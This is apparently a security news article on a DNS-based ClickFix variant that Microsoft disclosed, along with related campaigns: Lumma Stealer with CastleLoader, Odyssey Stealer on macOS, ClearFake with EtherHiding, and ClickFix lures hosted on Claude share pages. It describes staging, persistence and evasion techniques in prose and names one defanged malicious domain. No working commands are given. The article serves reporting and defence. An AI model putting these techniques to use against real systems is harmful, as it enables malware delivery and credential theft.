Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

Microsoft has uncovered a sophisticated new variant of the ClickFix social engineering attack that leverages DNS lookups to deliver malware payloads, marking a significant evolution in how threat actors bypass security controls through procedural deception rather than technical vulnerabilities.

The Evolution of ClickFix Attacks

ClickFix has emerged as one of the most effective social engineering techniques in recent years, exploiting human trust rather than software flaws. The attack typically begins when victims encounter fake CAPTCHA verification pages or bogus troubleshooting instructions that prompt them to run commands through their operating system's terminal or command prompt.

The technique's effectiveness stems from its exploitation of procedural trust - users are conditioned to follow technical instructions when encountering supposed verification steps or system errors. This psychological manipulation has proven so successful that it has spawned multiple variants including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

DNS-Based Staging: A New Attack Vector

The latest ClickFix variant discovered by Microsoft represents a significant technical advancement. Instead of relying solely on web-based staging, attackers now use the nslookup command to perform custom DNS lookups that retrieve the next-stage payload.

"In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," Microsoft Threat Intelligence explained. "The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload."

This approach offers several advantages to attackers:

• Reduced dependency on traditional web requests: By using DNS as a staging channel, the attack can blend with normal network traffic patterns
• Infrastructure control: DNS queries can reach attacker-controlled infrastructure while appearing as routine network activity
• Validation layer: The DNS-based approach adds an additional step before executing the final payload, potentially evading some security controls

Attack Chain and Payload Delivery

Once the DNS lookup retrieves the payload information, the attack chain proceeds through several stages. The initial payload downloads a ZIP archive from an external server (azwsappdev[.]com), from which a malicious Python script is extracted.

This Python script conducts system reconnaissance, runs discovery commands, and ultimately drops a Visual Basic Script (VBScript) that launches ModeloRAT - a Python-based remote access trojan previously distributed through CrashFix campaigns.

To ensure persistence, the malware creates a Windows shortcut (LNK) file pointing to the VBScript in the Windows Startup folder, guaranteeing automatic execution on system boot.

Broader Threat Landscape: Lumma Stealer and CastleLoader

The ClickFix technique has become central to the distribution of various malware families, particularly Lumma Stealer. Bitdefender has documented a surge in Lumma Stealer activity driven by ClickFix-style fake CAPTCHA campaigns that deploy CastleLoader, a sophisticated malware loader.

CastleLoader incorporates several evasion techniques:

• Virtualization detection: Checks for the presence of virtualization software
• Security program identification: Scans for specific security applications
• In-memory execution: Decrypts and launches stealer malware directly in memory to avoid disk-based detection

Beyond ClickFix, CastleLoader campaigns also leverage websites advertising cracked software and pirated movies. These sites deceive users into downloading rogue installers or executables masquerading as legitimate media files.

Cross-Platform Threats: macOS Targeting

The threat landscape extends beyond Windows systems. A macOS campaign has been observed using phishing and malvertising to deliver Odyssey Stealer, a rebrand of Poseidon Stealer (itself a fork of Atomic macOS Stealer).

Odyssey Stealer demonstrates the sophistication of modern macOS malware:

• Cryptocurrency focus: Prioritizes theft of credentials and data from 203 browser wallet extensions and 18 desktop wallet applications
• Full RAT capabilities: Beyond credential theft, it operates as a complete remote access trojan
• Persistent command channel: A LaunchDaemon polls the command-and-control server every 60 seconds for instructions
• Advanced features: Supports arbitrary shell execution, reinfection, and SOCKS5 proxy tunneling

Search Engine Manipulation and Ad-Based Distribution

Threat actors have developed sophisticated methods to distribute malware through legitimate channels. One campaign exploits the public sharing feature of generative AI services like Anthropic Claude to stage malicious ClickFix instructions.

These attackers create seemingly legitimate links associated with trusted platforms and distribute them through sponsored search results. For example, users searching for "macOS cli disk space analyzer" have been directed to fake Medium articles impersonating Apple's Support Team.

"The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site," AdGuard noted. "Clicking the ad leads to a real Claude page, not a phishing copy."

This technique exploits the trust users place in search engine results and well-known platforms, creating a potent malware distribution vector.

Email Phishing and AppleScript Attacks

Email-based campaigns continue to evolve with new tactics. One phishing campaign uses password-protected ZIP archives containing malicious SVG files that instruct victims to run PowerShell commands using ClickFix, ultimately deploying Stealerium - an open-source .NET infostealer.

Another macOS email phishing campaign prompts recipients to download and run AppleScript files to address supposed compatibility issues. The malware forges TCC (Transparency, Consent, and Control) authorizations for trusted Apple-signed binaries like Terminal and osascript, then executes malicious actions through these binaries to inherit their permissions.

ClearFake Campaign and Blockchain Abuse

The ClearFake campaign represents another evolution in malware distribution, employing fake CAPTCHA lures on compromised WordPress sites to trigger the execution of HTML Application (HTA) files and deploy Lumma Stealer.

This campaign also uses malicious JavaScript injections to exploit a technique called EtherHiding. EtherHiding executes contracts hosted on the BNB Smart Chain to fetch payloads from GitHub, offering attackers several advantages:

• Blending with legitimate Web3 activity: Malicious traffic becomes indistinguishable from normal blockchain operations
• Increased resilience: Blockchain's immutability and decentralization make takedown efforts more difficult
• Evasion capabilities: The technique helps bypass traditional security controls

The macOS Security Myth

Recent analysis by Flare has highlighted the dangerous misconception that "Macs don't get viruses." This assumption is not just outdated but actively dangerous, particularly given the cryptocurrency focus of modern macOS malware.

"Nearly every macOS stealer prioritizes cryptocurrency theft above all else," Flare noted. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible."

Organizations with Mac users need to implement detection capabilities for macOS-specific tactics, techniques, and procedures (TTPs), including:

• Unsigned applications requesting passwords
• Unusual Terminal activity
• Connections to blockchain nodes for non-financial purposes
• Data exfiltration patterns targeting Keychain and browser storage

Protection and Detection Strategies

Defending against these sophisticated attacks requires a multi-layered approach:

1. User education: Train users to recognize social engineering tactics and the dangers of running arbitrary commands
2. Network monitoring: Implement DNS monitoring to detect unusual query patterns and suspicious domains
3. Endpoint protection: Deploy security solutions capable of detecting in-memory threats and behavioral anomalies
4. Application control: Restrict the execution of unauthorized scripts and applications
5. Email filtering: Implement advanced email security to detect phishing attempts and malicious attachments
6. Search engine safety: Use browser extensions and security tools to identify potentially malicious search results

The ClickFix technique's effectiveness lies not in exploiting technical vulnerabilities but in manipulating human behavior. As such, the most effective defense combines technological controls with comprehensive user awareness training.

Organizations must recognize that the threat landscape has evolved beyond traditional malware distribution methods. The combination of social engineering, legitimate infrastructure abuse, and cross-platform targeting requires a holistic security approach that addresses both technical and human factors.

The emergence of DNS-based staging and blockchain-enabled payload delivery demonstrates that attackers continue to innovate, finding new ways to bypass security controls while maintaining the effectiveness of proven social engineering techniques. Staying ahead of these threats requires constant vigilance, updated security controls, and an understanding of the evolving tactics employed by modern threat actors.